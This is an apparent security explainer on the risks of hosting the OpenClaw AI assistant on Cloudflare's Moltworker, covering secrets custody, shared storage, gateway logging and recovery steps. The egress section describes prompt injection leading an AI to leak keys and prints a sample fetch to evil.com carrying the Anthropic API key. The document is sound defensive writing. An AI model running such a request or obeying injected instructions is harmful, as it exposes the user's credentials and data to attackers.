In Plain English: Running OpenClaw on Moltworker is like hiring a management company to run your business. They handle all the infrastructure, but they also have the keys to everything. If the management company gets hacked, so do you.
Time to read: 15 minutes Difficulty: Beginner-friendly with cloud computing context
| What You Gain | What You Give Up |
|---|---|
| No servers to manage | Control over where data is stored |
| Automatic scaling | Ability to audit security yourself |
| Always-on availability | Knowledge of who has access |
| Simple deployment | Ability to recover locally if things go wrong |
| Pay-as-you-go | Full encryption at rest |
The Core Question: Are you comfortable with Cloudflare having access to all your API keys, conversation history, and connected accounts?
The Analogy: Imagine giving a property management company a copy of every key to your house, your car, your safe deposit box, and your office. They promise to keep them secure, but you have to TRUST them.
What This Means Concretely:
When you deploy to Moltworker, these secrets leave your control:
- Your Anthropic API key (gives access to Claude)
- Your OpenAI API key (if configured)
- Your Telegram/Discord/Slack bot tokens
- Your WhatsApp session credentials
- Your gateway authentication token
Where They Go:
┌─────────────────────────────────────────────────────┐
│ CLOUDFLARE'S INFRASTRUCTURE │
│ │
│ ┌─────────────────┐ ┌─────────────────┐ │
│ │ Workers Secrets │ │ R2 Bucket │ │
│ │ (your API keys) │ │ (your data) │ │
│ └─────────────────┘ └─────────────────┘ │
│ │ │ │
│ ▼ ▼ │
│ Cloudflare employees CAN access (with audit) │
│ Cloudflare's security = your security │
└─────────────────────────────────────────────────────┘
Why Should I Care? If Cloudflare gets breached (it's happened to other companies), attackers could access:
- All your API keys (run up your AI bills)
- All your conversations (private messages exposed)
- All your connected accounts (impersonate your bots)
And you would have NO WAY to contain the breach locally because you don't control the infrastructure.
Historical Context:
While Cloudflare has a strong security track record, major cloud providers have experienced breaches:
- AWS S3 bucket exposures (misconfiguration)
- Azure AD token theft incidents
- Various API key leaks
Moltworker inherits whatever security posture Cloudflare maintains.
The Analogy: All the Moltworker containers share the same locker (R2 bucket) and the same keychain (environment variables). If one container is compromised, the attacker can access everything.
Technical Detail (Plain English):
In Moltworker, when your code runs, it has access to:
- ALL your environment variables (API keys, tokens)
- ALL your R2 bucket contents (sessions, credentials, history)
There's no way to say "this specific request should only see these specific credentials." It's all-or-nothing.
What This Means:
If a prompt injection attack succeeds in executing JavaScript within the Moltworker:
- The malicious code has access to
env.ANTHROPIC_API_KEY - The malicious code can read from the R2 bucket
- The malicious code can make outbound requests (see next section)
See: Prompt Injection Attacks -- 30 examples of how attackers craft these payloads, including data exfiltration techniques relevant to the egress gap below.
The Analogy: To change your locks, you have to coordinate with everyone who has a key.
What Happens If You Need to Rotate a Key:
- Generate new key (at Anthropic, OpenAI, etc.)
- Update Cloudflare secrets via
wrangler secret put - Redeploy the entire Worker
- Hope there's no window where old key is abused
There's no way to:
- Rotate keys without redeployment
- Test new keys before going live
- Roll back to old keys if new ones fail
The Analogy: Your Moltworker can call ANY phone number in the world. If a clever attacker tricks it into calling their number (via prompt injection), your secrets get "read out loud" over the phone.
What Actually Happens:
- Attacker sends a specially crafted message to your bot
- Message tricks the AI into thinking it should "export" data
- AI constructs a fetch request like:
fetch("https://evil.com?key=" + env.ANTHROPIC_API_KEY)
- Moltworker happily makes that request (no egress filtering)
- Attacker's server receives your API key
- You have no idea this happened until the bill arrives
Why Moltworker Is Different: On a VPS or Mac, you can set up firewall rules to block outbound traffic to unknown servers. On Moltworker, there is NO egress filtering - the sandbox can call any external server.
Comparison:
| Deployment | Egress Control | Exfiltration Risk |
|---|---|---|
| Mac Mini | Can use Little Snitch, firewall rules | 🟢 Controllable |
| VPS | Can use iptables, ufw | 🟢 Controllable |
| Moltworker | None (Cloudflare controls) | 🔴 Cannot restrict |
Partial Mitigation:
You cannot prevent exfiltration, but you can:
- Monitor AI Gateway logs for unusual outbound requests
- Set up billing alerts to catch unexpected API usage
- Use API keys with strict rate limits
The Analogy: You keep your passport, birth certificate, house deed, and all cash in one safe. If someone cracks that safe, they get everything.
What's Stored in R2:
| Data Type | What It Contains | Impact If Leaked |
|---|---|---|
| Sessions | Conversation history | All your private messages exposed |
| Credentials | Bot tokens, OAuth | Full control of your bots |
| Config | Settings, preferences | How to attack you |
| Pairing codes | Device authorization | Can pair malicious devices |
There Is No Encryption:
R2 data is encrypted at rest by Cloudflare, but:
- Cloudflare can decrypt it (they hold the keys)
- Anyone with R2 access can read it
- There's no user-controlled encryption layer
What You Can't Do:
- Encrypt data with your own keys before storing
- Audit who accessed what data
- Physically secure the storage
The Analogy: Every phone call you make goes through a switchboard operator who listens in and takes notes.
What Actually Happens:
All your requests to Claude/OpenAI go through Cloudflare's AI Gateway:
- Your prompt goes to AI Gateway
- AI Gateway logs the request (for debugging/monitoring)
- AI Gateway forwards to Claude/OpenAI
- Response comes back through AI Gateway
- AI Gateway logs the response
What This Means:
- Cloudflare has access to all your prompts
- Cloudflare has access to all AI responses
- These logs may be retained according to Cloudflare's policies
- You cannot opt out of this logging in Moltworker
Comparison:
| Deployment | Who Sees Your Prompts |
|---|---|
| Mac Mini | Just you + AI provider (Anthropic/OpenAI) |
| VPS | Just you + AI provider |
| Moltworker | Cloudflare + AI provider |
The Analogy: The guest list for your party is posted on a public bulletin board.
What Actually Happens:
- When someone tries to pair a device, a pairing code is generated
- The code is stored in R2 (shared storage)
- The user enters the code to complete pairing
- If R2 is compromised, attacker can see pending pairing requests
Attack Scenario:
- Attacker gains R2 access
- They see a pending pairing request from a legitimate user
- They approve it before the legitimate user does
- Attacker's device is now paired to your bot
Pairing Code Length:
// From src/pairing/constants.ts
export const PAIRING_CODE_LENGTH = 8;8 characters provides reasonable security for the short validity window, but if attacker has R2 access, they can read the codes directly.
The Analogy: You give someone permission to browse the web on your computer. They can visit any site, fill out any form, and submit anything - as you.
What Moltworker Can Do:
Moltworker includes browser automation capabilities:
- Visit any website
- Execute JavaScript on pages
- Fill out forms
- Submit data
- Read page content
Attack Scenario:
- Prompt injection tricks AI into visiting a malicious site
- Site executes JavaScript that exfiltrates session data
- Or AI is tricked into submitting forms on legitimate sites
- Actions happen as if you did them
Partial Mitigation:
Browser JS execution is now gated behind a config flag:
// Browser evaluate requires evaluateEnabled flagBut the fundamental capability exists if enabled.
| Scenario | What Happens | How to Recover |
|---|---|---|
| 🔴 Cloudflare breach | ALL your credentials and conversations exposed to attackers | You CANNOT recover locally - assume everything is compromised |
| 🔴 R2 bucket compromise | Attacker reads all historical conversations, sessions, and credentials | Rotate all keys, assume all historical data is leaked |
| 🟠 Prompt injection → key exfil | Attacker uses your AI API keys for their own purposes | Rotate keys immediately, set up billing alerts |
| 🟠 Pairing interception | Attacker pairs their device to your bot | Revoke all pairings, audit connected devices |
The Harsh Reality:
With Mac Mini or VPS, if something goes wrong, you can:
- Unplug the network cable
- Take a forensic image
- Rotate keys from a safe location
- Control the timing of your response
With Moltworker, you cannot do any of this. You're dependent on Cloudflare's response to any breach. You have no local copy to fall back to.
- Experimenting / proof-of-concept - Learning how OpenClaw works
- Non-sensitive use cases - Public bot, no private data
- Convenience is priority - Don't want to manage infrastructure
- Temporary deployments - Quick demos or testing
- Handling sensitive personal data - Health, financial, legal
- Business-critical communications - Customer support, sales
- Regulated industries - Healthcare (HIPAA), finance (PCI), legal
- Any situation where you need full audit control
- When you need to guarantee data doesn't leave your control
| Risk Category | Mac Mini | VPS | Moltworker |
|---|---|---|---|
| Data location | Your hardware | Remote but you control | Cloudflare controls |
| Who can access data | You (with physical access) | You (with SSH) | Cloudflare + you |
| Egress filtering | Yes (firewall) | Yes (iptables) | No |
| Emergency shutdown | Unplug | Destroy VPS | Contact Cloudflare |
| Audit capability | Full | Full | Limited to logs |
| Encryption control | Full (FileVault) | Full (LUKS) | None (Cloudflare keys) |
| Breach recovery | Local wipe | Destroy + rebuild | No local control |
- Understand what you're giving up - Read this document fully
- Evaluate your threat model - Is cloud-hosted acceptable?
- Consider alternatives - VPS may be better for sensitive use
- Use separate API keys - Not the same keys as production Mac/VPS
- Set strong gateway auth token
- Enable AI Gateway logging (for your own audit)
- Set up billing alerts on all API providers
- Configure rate limits on API keys used in Moltworker
- Review AI Gateway logs regularly for unusual requests
- Monitor R2 access logs (if available)
- Set up alerts for unusual API usage patterns
- Review paired devices periodically
- Document how to revoke all credentials stored in Moltworker
- Know how to delete the Worker and R2 bucket
- Have local backups of any non-sensitive configuration
If you suspect Moltworker compromise:
- Delete the Worker immediately:
wrangler delete
- Rotate ALL credentials:
- Anthropic API key
- OpenAI API key
- Telegram bot token
- Discord bot token
- All OAuth tokens
- Revoke all device pairings:
- Telegram: @BotFather /revoke
- Discord: Developer Portal
- WhatsApp: Log out all Web sessions
- Audit connected accounts for unauthorized activity
- Consider breach notification if you handle others' data
- Empty the R2 bucket (delete all stored data)
- Review billing for unexpected charges
| Component | Source File | Notes |
|---|---|---|
| R2 storage | Moltworker deployment | All data in single bucket |
| AI Gateway | Cloudflare routing | Logs all requests |
| Pairing codes | src/pairing/constants.ts |
8-character codes |
| Browser rendering | Cloudflare Browser Rendering | JS execution capability |
| Environment variables | wrangler.toml + secrets |
Accessible to all code |